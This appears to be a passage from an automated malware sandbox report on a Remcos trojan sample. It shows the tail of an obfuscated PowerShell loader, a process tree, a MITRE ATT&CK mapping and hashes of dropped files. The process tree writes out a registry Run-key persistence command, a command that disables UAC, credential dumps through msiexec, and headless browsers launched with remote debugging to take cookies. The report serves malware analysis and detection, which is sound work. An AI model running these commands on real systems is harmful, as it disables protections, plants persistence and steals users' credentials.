U,sDEpiteAu,oK mimSHyldECavarSta,iFl.mNStraG Ta,EDrimnR.geSYeao)');while (!$Komplementvinklernes) {Remanufactures139 (Bibiann 'Sisk$ B rgRstelHansoSurrbSlgtaSau.l sca: OffPTreka M,lrDispaUdr p EkstBadeeLydbr Idea Le lPian=Port$ DisHAtt a.emel.tdteHerbtPre u IntdHe.msE ple') ;Remanufactures139 $Spadestikkets246;Remanufactures139 (Bibiann 'PyresF tiTJordaSpisrPremtFi b-WolfST ndlP,tbe SememadkP Sva hypa4');Remanufactures139 (Bibiann 'Anti$ losgIrreLNulloDe iBD.elASa dLPung: AllK D.toSavnMHo ePMauvLSljdEupo,mBackEw.etn MrkTAminvradiiVestnOldskStorLBaljeIndlrPrecnUna,ER krsMaen= Udf(TnkeT indE StvSPromt inn-TagspTogvaKarttKlinhRegr ,rre$S riIAkkvN FladEphoeSos kSt lS KonEOm,lrMoorIbrutNProdgjorde HumNAct sSlag)') ;Remanufactures139 (Bibiann 'Wret$CarggCleaLSiruoKwapBAmorA Fjal,ksp: PlyiCultNAl oFReshLToppeUpo CBrakTDhanE eldd For=M,rr$BehoGMenul,rnrO humbMasoaMas,lA te:S,lfwCensoT,rio Mo,dH.apG An,O M kLNonfED ctmB ni+Kvrk+Ho e%m ll$Vik.WUnarAFar.M.dble.rodFIm ru k.nLaposSStri2Desi4 Kva2Preb. A,vcStano RinUPr cnSme t') ;$Tvrfagenes=$Wamefuls242[$Inflected]}$Ryddeliges=280530;$Brickwork=30269;Remanufactures139 (Bibiann 'Herr$Sm lgRelalForuo U obBiblAArrolIhuk:Garno KompKollr KriR,eucSAffiS DortHemaI nsFMispTKrake ChuRDice8Insp0ss n Phar= Ama IndsgKakkeTyreThigh- Po cExamO ,itnDa,kTBulbeSaxoN.creT Uds Si j$SlutIEighNceraDMu leI stk TansSammEBredrPas ILigbn ropgSlouEKaleNS ips');Remanufactures139 (Bibiann ' I a$Sangg Dejl rvlonor bSolhaForslRec : N dDHa myBiblsGroufRehaaUndesHam iLeersTheo .ent= Dat hv s[OmdbSSludy armsNedstmbeleAbenmSpid. OpsCSkipoNdstn Po,vprobePrgnrFunkt Fer] arv:u.or:UnliF ,ibr BonoPyt,mI lgB ervaunresTilfeSme,6Doce4BulnS istUdmar S mi DernHerigLogf(H.rk$Eu.oO D spXylorKommrH emsForvs,hontVensiSalgf subt Tawe Halr Rew8U,op0rets)');Remanufactures139 (Bibiann ' Inq$Vineg MaslSideONonrBMyreaHel L Khi:haanp ederUndiOYndlpParaO ourrForstNonfiCircoMicrNMu saJuniB Be iKatoLForvIErrot SarYOutl2Forg4Fr g5Inte dfr=Cygn Bi f[SlavsSu jYSkgvSFremtLoboESeelm,fre.HypeTD saeCompxMeruT la.RoutEVirvnpr icFjlmOGeosDreaki supnomnigK rt]Unev:Ljtn:U puAHumoSTra,CSweeiPersIDac .Sch.G ConE P,nTMultsSnapTRigarIn,eI hrNUppeGGuln( Kon$TreddHingYOrbiSPjadF MaiAafflSLetfIAndosKvad)');Remanufactures139 (Bibiann 'Ochr$ Svrg TrvLM ckOAccebHemoaExcoLLith:TackgNeptr BioUU.hntSkvmnDybdIHoffNGynegAntieGrafNF.risSkep=Or a$ SeePTrenRRu.kODesuPun aOTootr,ocit M tiVarmO HalN.limaSuccbFac IrefeLMasciGo pTK aly ,et2Inte4bibl5Midt.,ntisTheruDiabB Pe sA ettMeshrC nhi Menn BurG Fes(De a$ ankRAngiYAaredTranD,rigEGlocL othiSatsgflooE Pres Det,Hemi$ ChaBUnveRSulciRoknc R sKSvanWDrisoGal R epKSem.)');Remanufactures139 $Grutningens;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:468
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:212
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Emboldened% -windowstyle 1 $Melolonthinae=(gp -Path 'HKCU:\Software\lestiwarite\').Generalljtnanten;%Emboldened% ($Melolonthinae)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4868
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Emboldened% -windowstyle 1 $Melolonthinae=(gp -Path 'HKCU:\Software\lestiwarite\').Generalljtnanten;%Emboldened% ($Melolonthinae)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:3556
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4972
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wjvbtp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4412
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yljuuhfytw"
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yljuuhfytw"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:1984
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jfoevapshewud"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:908
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb2981cc40,0x7ffb2981cc4c,0x7ffb2981cc58
      4⤵
      PID:3860
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,9789516048595635818,14411517208489685551,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2
      4⤵
      PID:2192
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,9789516048595635818,14411517208489685551,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2112 /prefetch:3
      4⤵
      PID:1996
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,9789516048595635818,14411517208489685551,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2436 /prefetch:8
      4⤵
      PID:2900
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,9789516048595635818,14411517208489685551,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:216
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,9789516048595635818,14411517208489685551,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4616
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4388,i,9789516048595635818,14411517208489685551,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4620 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2160
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:3172
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb1b0746f8,0x7ffb1b074708,0x7ffb1b074718
      4⤵
      PID:4348
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,6092993891770210517,10554994765061571462,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2
      4⤵
      PID:4628
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,6092993891770210517,10554994765061571462,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
      4⤵
      PID:1904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,6092993891770210517,10554994765061571462,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
      4⤵
      PID:1576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2036,6092993891770210517,10554994765061571462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2036,6092993891770210517,10554994765061571462,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3136
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2036,6092993891770210517,10554994765061571462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3260
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2036,6092993891770210517,10554994765061571462,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5080

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:544

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1604

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Network Share Discovery

T1135

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
5bb034e03cdfc374ee7485780a1dd392

SHA1
cddfc795543bdf2f3feddb31e6560a2ce33527e5

SHA256
d3f5ce0c711f6a2069f45b918a819546997fc7f5e0d8e95691c2ef9fbd27eccf

SHA512
5d1b892af6fcacb82b7a55641c2fb9e0ea0c0d33d09e9e943ed392bb67ff45daedd6ef7da8b68750d298f34a7a40863b392de003191809a92a04f3f94cc09399

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71444def27770d9071039d005d0323b7

SHA1
cef8654e95495786ac9347494f4417819373427e

SHA256
8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

SHA512
a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
dadafaa713a937f030afb7ed42bd91be

SHA1
af41b3dfc47faaf2d6499c64b773c27da4f9f97f

SHA256
24b0f1fdf0069cd167dda6f331ea81a0829ff764f275cb7a9134e81e716f22bd

SHA512
fcd3f7a499e000067fd94e51c7770ea5e65b3b87452c0056d1b89a4bec3035871d4b2f9854de66ef5473575f5887b0da19febd121ec2b91ab07c77107ac36586

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
2ba0f26b938aa2874ff6a6f3c6c5a4ce

SHA1
998b6d7665527892d04f9469d920cf8606526362

SHA256
0c9faa6384393e37ddb5d09595d9e30493afd3f171268134d795c5beac7a976c

SHA512
939f78f1cafaecba88c3968a72c34222c1db7f172b1a8561d63cad814e9cfacb1e1314e0a917e9c95d5f96bdda4f51c2c469c200f2cb5b8738fbae88cc1fd5f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
a30b0519c78f516ac5c137f85dadf066

SHA1
f73d4285a6f931fa8293377008e72a8894d26e09

SHA256
d1964eac7f16027e0f8e92bc6ee1578b155cb9eb72135346dbc15598484bbd19

SHA512
1708cf35bcaf6b70c5c9784ce64bde0f8b34b0b563cbd61059327b58e1d336d1fc90a5107a3c8f642e30be4da6fa1961202102cc657d329c1121e117096fb8c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
180642dc0518c1a6e13d2a0b1887880c

SHA1
89897beacd48238b02e09d5eedb883e5f64f267d

SHA256
c4b2bd7b1b0124a01df0a25c58e283f29c52cd5bc25ab58fcd34e35dd7cba0cd

SHA512
0d8655e7a110e487232956f1925aa06cc2249a8cf1d7b3e13be1a624cdf0c451210b7721e99ccf42b4cc2aeffe2abaeb600c1095a7bf7fb542aa3ca25bf7f325

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
ddc497ecc1bc9548211066451408f4c4

SHA1
ba8076375fa94604195e430bb5732d0794cd715a

SHA256
6543dbb1abfd1e71d809e0ad9b6bc05b2c240f9ea7010405c2f4ff60e2a949bb

SHA512
c605a822b2114fb1320aad665a7f6f0455485c4cac6f8fd179e798867d5c670204c9491bc4b20bdf0530cf2bf1297a6356d35839e6675686bfd7091c359fa8e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Extension State\LOG

Filesize
263B

MD5
844e982ae3341e9549a5c94b8c7b1056

SHA1
878b2c5e0b41f18302768d16c94ef1f200efe616

SHA256
d12bce47fb06cff8db8d24bc337fea9b01dea9d7798cb3203d0e42f5bd053e3c

SHA512
c883167a8f2dfcbda763dcf88fd882a5860bd5ad240f5990380763d9eb2447ed52de7c42e12fc3edbca973e852527600151576ffe7f72edb7a358a06e3b133e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

Filesize
20KB

MD5
b40e1be3d7543b6678720c3aeaf3dec3

SHA1
7758593d371b07423ba7cb84f99ebe3416624f56

SHA256
2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

SHA512
fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

Filesize
256KB

MD5
6f3cbb3c59403c0909fd7eda103d0601

SHA1
3f7804d6b08ee238cf4f621f869221dd5e512254

SHA256
02a9e2ca0503e41db79aba8bc3fdd2baf05c2176d49e98a60e6932a79de17c5e

SHA512
ae7c48b1105068340e882f44d13ae1c613c72653bc0272a9a6a650b2c6ef879d096f46ea0bf84ed744083ab67a728f7714e399f159b630f622dcf756dc6edc30

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

Filesize
192KB

MD5
d30bfa66491904286f1907f46212dd72

SHA1
9f56e96a6da2294512897ea2ea76953a70012564

SHA256
25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907

SHA512
44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

Filesize
277B

MD5
b7d251ceadf95d1ad50ab768a656771e

SHA1
74bdaee2891917b37ad291ae259f357585f3d499

SHA256
835e0d9a9186c50ed86f0b5c72e7af4a5d09be4be33826eaf3322ab399912a74

SHA512
22060914ab30b1bacca6cba3419645c81bcede21ee03855481ef562e92f53df9bca710bb423f23ddffff95cf8cdd7e5f6a5ad4a88666375b6b02785aea7626b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

Filesize
1KB

MD5
368624674e9dc87d988ce137ced9a2a2

SHA1
c57d3e282ec147438145b3596b4020b7133ca7ab

SHA256
7a153d769211a8633a6a8bc3513d2c44c4d65ce1b210e731827a2dc156259843

SHA512
1eacacd154ce022f1abd3d20fe5bcb621a77c593d019e8d0284417b0002af3211df58cb6f75f4af1c24e02da49d1da64a5b5486361e33dda3531117811e6aee3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

Filesize
20KB

MD5
8c7d092dcceb7e40dbdfd3372bb3a61e

SHA1
1efd978570b32a415cf2a30524b92bde6a705a36

SHA256
399bb9e62546f1035f3c5ed7221d139d5f3050213f0d8fa6c4f0c0bebcb780a7

SHA512
53d75febc93b3c6a26fecd86cd9c6a8cd18d4f0a8e01645f280ce64eab719d73496b6953693dddb41710597a0fe5c3a36bb325a038fa4b281116f8770d1acd5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
5KB

MD5
16f86552bbe20e0033ebaac4fede8864

SHA1
67cfc33011e2f412a5d0e4fc5cbee38645c03482

SHA256
ad5cad8087d8c0a33f6aeb77d203157dc8172cdf04d053a4443c15d2e2ff5c6a

SHA512
f283537a7af2c5cc20bcc7716adbe05204bcfb84635371d69d05a89a1a9a970d1908ebf9ccca3852bfd0f09492a6e2d73b5086b4db7ff68172632814896fc847

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
1KB

MD5
537a9e53b104bce731a71088b038c187

SHA1
3ee635e8355696f136c1aa7aa358b5a43c977dfa

SHA256
fac02b374327f114e2e82b642acfbc31f7814c6a3245275658dc73d9cf1883eb

SHA512
28c7c0b9863552ab3f24fe4137270951c737fa9802d0ea39d99cac241b4449e0fbdf4da52ee37db36c0175b81cad2bbe22a42b57bc2d743be3e87bbf265e36a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
15KB

MD5
201fa205707c48fcee92326e5894e567

SHA1
ada346a5ef114e5a831563ace50c6650667b23f7

SHA256
f122d839832c9b9f4feed61b2f5d5f1165d8f29a5563580fe6af3550113aa959

SHA512
48701c66064274e0d0e62c190fb12fce104ddb795006662318c6560a956d7444ec3c81e6149a04c48ae7007cea6458d7da1fd6ab37130c2763fd88210f957242

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
24KB

MD5
9da700b1b16d296afca78d43dc061268

SHA1
d4b5d202b4525e85295232e1d301bd422c02350c

SHA256
78cfd9cd2d766b888ccc68374b41e0d407b9db2eea378598b05a70dfe1e10784

SHA512
13612c5be4c4594548cf3e3d1953a8ea54f4a47c44711ed471426e14c7c96503427cc4c433a0169641d54bcf70f8b5fb4ccf1a9cdf2b492619808ffbbd8c3831

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

Filesize
241B

MD5
9082ba76dad3cf4f527b8bb631ef4bb2

SHA1
4ab9c4a48c186b029d5f8ad4c3f53985499c21b0

SHA256
bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd

SHA512
621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

Filesize
279B

MD5
45b27557024d9168946e57ffadd801e7

SHA1
e6c2ca2ac1611ab26c8f415fd8f0bb36c4f4eee5

SHA256
837a59c6e3a1cd3690af08f81b6180bf391d92b9a928983e64ee794b1dce5b14

SHA512
